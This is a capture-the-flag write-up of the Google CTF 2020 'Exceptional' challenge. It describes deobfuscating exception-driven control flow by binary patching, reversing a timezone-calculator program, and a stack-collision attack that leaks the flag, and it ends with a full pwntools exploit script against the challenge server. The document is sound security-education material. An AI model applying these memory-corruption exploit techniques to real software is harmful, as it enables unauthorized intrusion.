Google CTF - Exceptional (363pt / 10 solves)
C++ Exception Hell
August 23, 2020
pwn
cpp
Exceptional
This binary is quite exceptional in its structure. Do you accept the challenge?
I spent nearly 12 hours on this challenge and finally solved it at 6:30 am after staying up all night and going through at least 5 cups of coffee. r3ndom helped with some of the later reversing steps.
The challenge was very fun and I developed a lot of patching techniques that I think will be handy for related problems in the future.
Files:
exceptional
: original binaryexceptional_patch
: heavily patched binary with better control flow
Part 1: Investigation
After opening the binary, we find that the control flow has been fragmented into tons of small blocks that are linked together with call
’s:
Our main function is:
which calls:
and that calls:
and so on…
To get some reasonable disassembly, we can convert all of these call
instructions into an equivalent jmp
. This will hint to our disassembler (I use Binary Ninja) that all this code is part of a single subroutine.
Patching by hand is tedious so we can use regular expressions™
Transform 1:
In x86, a 4-byte relative call is encoded as e8 xx xx xx xx
. To convert to 4-byte relative jump, we simply replace the first byte with e9
. The following regex can be used in python: b'\xe8[^\xe8](.|\n){3}'
(there is a false positive with an e8
right before a call so we can avoid that specific case).
Before replacing the jump, we should also ensure thst the jump target is one of the user-defined functions (in the range [0x1160, 0x2b0f]
).
I found that this patch ends up working fairly well by itself. However, the decompiler gets confused with all the stack frame shenanigans. To prevent this I removed all the function prologues from our jump targets:
After applying these modifications, I found that binja had a much easier time with decompilation. It was able to chain some blocks into larger chunks:
New main:
which calls:
As we start to poke around, we see a lot of calls to __cxa_throw
in strange places:
We also find several handler routines that seem to just invoke a different user subroutine:
It is evident that this exception handling stuff is just used to obfuscate control flow. In order to deobfuscate the binary, we need to figure out the mapping between a __cxa_throw
call and a specific handler routine.
Part 2: Exception patching
I briefly investigated the __cxa_throw
mechanics and observed the following:
- There are 5 different possible exception types (specified as
tinfo
in the__cxa_throw
call). - There are 15 handler routines
- There are 23 places where
__cxa_throw
is used
So how does the program figure out which __cxa_throw
goes to which handler? Well, in short, it’s magic:
At this point we have two options:
- Learn about how C++ exceptions work in order to make this process not magic
- Use
gdb
to dynamically figure out this exception mapping buisness
Of course, being a lazy CTF player, I used option 2. The process works as follows:
- Set a breakpoint at every
call __cxa_throw
instruction. - Set a breakpoint inside every handler routine. (this is equivalent to setting a breakpoint at every
call __cxa_begin_catch
instruction). - Interact with the program normally and wait for the program to break on a
call __cxa_throw
. Continue so it hits a corresponding handler breakpoint. - Keep track of the
throw: handler
mapping. - GOTO 3
Eventually, I uncovered mappings for most of the __cxa_throw
calls. Luckily all except three of these were deterministic and always mapped to the same handler. The other three could map to one of two different handlers.
Unfortunately, because I chose option 2 earlier, I have no idea why this happens and this is still magic.
# address mapping
# (call __cxa_throw) -> (call __cxa_begin_catch)
TARGETS = {
0x1335: 0x2392
0x1357: 0x15e3
0x13d8: 0x2844
0x1430: 0x21b5
0x149b: 0x18e5
0x1528: 0x1649
0x18a7: 0x2bbb
0x198f: 0x2844
0x1a2c: 0x2392
0x1be2: 0x14c1
0x1fb9: 0x2bbb
0x24ed: 0x2211
0x257b: 0x2844
0x2736: 0x2844
0x29b3: 0x2bbb
0x2a88: 0x2408
}
MULTI = {
0x1c90: [0x17fa, 0x2486]
0x2607: [0x2967, 0x229d]
0x292b: [0x17fa, 0x2486]
}
To deobfuscate these exception “jumps” we can use a similar strategy as before. Each time we encounter a call __cxa_throw
, we can simply patch in a jump directly to the handler routine. Since the handlers all follow a similar pattern, we can even bypass the __cxa_begin_catch
and jump directly to where the handler returns control to the user code:
In the case where we have two possible exception handlers, we need to somehow indicate to the disassembler that either handler could be used. We can use a similar patching strategy but this time, insert a jz
to decide which target to take. For the purposes of this kind of patching, we don’t need the final executable to actually work; we just want some reasonable control flow to work with:
Using this strategy we end up with some very clean control flow and we can get some readable decompilation such as this add_city
function:
(There is a residual unpatched __cxa_throw
at the end here but it doesn’t affect the main logic)
Part 3: Reversing
Now that we have a usable binary, we can start reversing what the program is doing. Essentially the program keeps track of cities and lets us convert between different timezones. Here is an example interaction:
Welcome to city timezone calculator.
Menu:
1. Add city
2. List cities
3. Calculate time
4. Quit
1
Type city name and timezone (e.g. "NewYork -4"): NewYork -4
Menu:
1. Add city
2. List cities
3. Calculate time
4. Quit
1
Type city name and timezone (e.g. "NewYork -4"): other_city 5
Menu:
1. Add city
2. List cities
3. Calculate time
4. Quit
2
List of cities:
01. NewYork UTC-4
02. other_city UTC+5
Menu:
1. Add city
2. List cities
3. Calculate time
4. Quit
3
Type your city and current time (e.g. "NewYork 12:34"): other_city 12:10
Type the other city: (e.g. "Washington"): NewYork
Current time in NewYork: 03:10.
Menu:
1. Add city
2. List cities
3. Calculate time
4. Quit
4
The add_city
method (shown above) is fairly straightforward and we see that the city struct is something like:
struct city {
int unk1;
int unk2; // -1
int unk3; // -1
int timezone;
char[0x30] name;
};
City information is stored in an array of size 100 starting at 0x75d0
however internally cities are referenced by an index where the address is computed as 0x7120 + (idx * 4)
. So the first city is at index 0x12c
.
Conveniently the program also reads from flag.txt
and stores the flag at address 0x7440
(equivalent index: 0xc8
).
After initializing the struct, add_city
calls link
:
This function reveals how city information is stored. At the start it computes a 32-bit hash of the city name via something like:
def str_hash(s, k=0x12345678):
s = (s + (b'\x00' * 48))[:48] # pad
for i in range(0xc):
blk = s[i*4:i*4+4]
v = struct.unpack('<I', blk)[0]
k ^= v
return k
Then it iterates through a sorted binary tree of cities (sorted by hash) until it either finds the city and prints "City already exists"
or it doesn’t find the city and instead inserts it into the binary tree. So with this information, we can complete the city struct:
struct city {
int hash;
struct city *left;
struct city *right;
int timezone;
char[0x30] name;
};
Note: left
and right
are not actually pointers but rather “city indexes” as described earlier
Part 4: Exploitation
Based on the way city data is structured, it seems clear that the goal is to corrupt this data and somehow interpret the flag as a city struct which could let us leak information.
During the reversing process, I found that the binary uses an “operation stack” that seems to be used to curry information between different basic blocks. For example, during add_city
it pushes 1
(the add operation number) and then city_idx
. These values are later popped off and the stack is reset before the program loops.
However, the stack starts at 0x9120
and conveniently grows towards smaller addresses. If we can get this to overlap our city array, we could corrupt some city information.
At this point it is useful to draw out a memory diagram:
I spent some time trying to figure out how to collide the stack with the city data and I eventually realized that when you call compute_time
, the program will push the current hash and index to the stack as it searches through each node in the binary tree.
So given a very lopsided binary tree, you could force a “worst-case” search where it iterates close to 100 times.
It’s fairly easy to construct a lopsided tree; we can simply compute a bunch of hash values and then sort them:
names = [str(i).encode('ascii') for i in range(100)]
names = [(x, str_hash(x)) for x in names]
names = sorted(names, key=lambda x: x[1])[::-1]
order = [x[0].decode('ascii') for x in names]
print(order)
# names with descending hash values
['79', '69', '59', '49', '39', '29', '19', '99', '89', '78', '68', '58', '48', '38', '28', '18', '98', '88', '71', '61', '51', '41', '31', '21', '11', '91', '81', '70', '60', '50', '40', '30', '20', '10', '90', '80', '73', '63', '53', '43', '33', '23', '13', '93', '83', '72', '62', '52', '42', '32', '22', '12', '92', '82', '75', '65', '55', '45', '35', '25', '15', '95', '85', '74', '64', '54', '44', '34', '24', '14', '94', '84', '77', '67', '57', '47', '37', '27', '17', '97', '87', '76', '66', '56', '46', '36', '26', '16', '96', '86', '7', '6', '5', '4', '3', '2', '1', '0', '9', '8']
After a bit of experimenting, I found that if I added 98 cities with these names and then searched for a city with a lower hash than all the cities (such that we need to traverse in the worst case), I could overflow city[97].left
with the hash value of the city we are searching for (as it is pushed to the stack during compute).
So what is our goal here?
Well, a nice feature of compute_time
is that it prints the message "Current time in %s: %d:%d."
and specifically dereferences the target city we provide. Now this message will only print if the target city is actually found. This means the hash of the city we provide must match the hash of a city in the tree.
So if we can add index 0xc4
to the tree (right before flag data), we would have a city with values:
struct city {
int hash = 0;
struct city *left = 0;
struct city *right = 0;
int timezone = 0;
char[0x30] name = <flag>; // at address 0x7440
};
Then if we search for a name with hash 0
, such as the string 3aaaK7Us
, we would match this fake city and it should print the flag.
Now there is a slight caveat: we want the first search to take a long time so we have a stack collision. However when we search for the flag hash, we want this to be quick so we don’t accidentally overwrite city data a second time. To do this, we simply need to set up two chains: city[0] -(left)-> city[97]
with descending hashes that will let us search for the flag quickly after we overwrite city[97]
. And we also want: city[0] -(right)-> city[1] -> city[2] ...
that will let us search for the hash 0xc4
and collide the stack.
To set this up, we need the hash for city[0]
to be less than 0xc4
but greater than zero.
I’ve illustrated this attack below:
Here is the full exploit code:
from pwn import *
def add_city(name, tm):
s.sendafter('4. Quit', '1\n')
s.sendafter('(e.g. "NewYork -4"):', '%s %d\n' % (name, tm))
def compute(a, b):
s.sendafter('4. Quit', '3\n')
s.sendafter('(e.g. "NewYork 12:34"):', '%s 1:1\n' % a)
s.sendafter('(e.g. "Washington"):', '%s\n' % b)
def str_hash(s, k=0x12345678):
s = (s + (b'\x00' * 48))[:48] # pad
for i in range(0xc):
blk = s[i*4:i*4+4]
v = struct.unpack('<I', blk)[0]
k ^= v
return k
names = [str(i).encode('ascii') for i in range(100)]
names = [(x, str_hash(x)) for x in names]
names = sorted(names, key=lambda x: x[1])[::-1]
order = [x[0].decode('ascii') for x in names]
order[0] = '3aaaK7Us\x22' # hash: 0x22
order[97] = '3aaaK7Us\x11' # hash: 0x11
s = remote('exceptional.2020.ctfcompetition.com', 1337)
for i in range(98):
add_city(order[i], 1)
# stack overflow
# city[97].left = 0xc4
compute(order[0], b'3aaaK7Us\xc4')
# search for flag with hash 0
compute(order[1], b'3aaaK7Us')
s.interactive()
Current time in CTF{3xcepti0n_or1ent3d_pr0gramm1ng_r0x!}